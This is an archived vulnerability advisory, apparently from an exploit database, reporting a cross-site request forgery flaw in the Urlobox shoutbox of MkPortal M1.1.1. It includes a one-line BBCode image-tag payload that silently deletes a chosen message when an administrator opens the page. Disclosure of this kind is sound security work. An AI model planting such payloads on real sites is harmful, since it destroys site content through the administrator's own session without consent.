id: 1287
date: 12/21/2006
title: MKPortal M1.1.1 (Urlobox) Cross Site Request Forgery Vulnerability
author: Demential
cves: 

==================================================================
MKPortal M1.1.1 (Urlobox) Cross Site Request Forgery Vulnerability
==================================================================


MkPortal Urlobox Cross Site Request Forgery

Discovered by: Demential
Mkportal website: http://www.mkportal.it

posting [img]?ind=urlobox&op=delete&idurlo=X[/img] in MkPortal urlobox
where X is an ID of a message,
when administrator opens urlobox page message X will be erased.



#  0day.today [2023-03-24]  #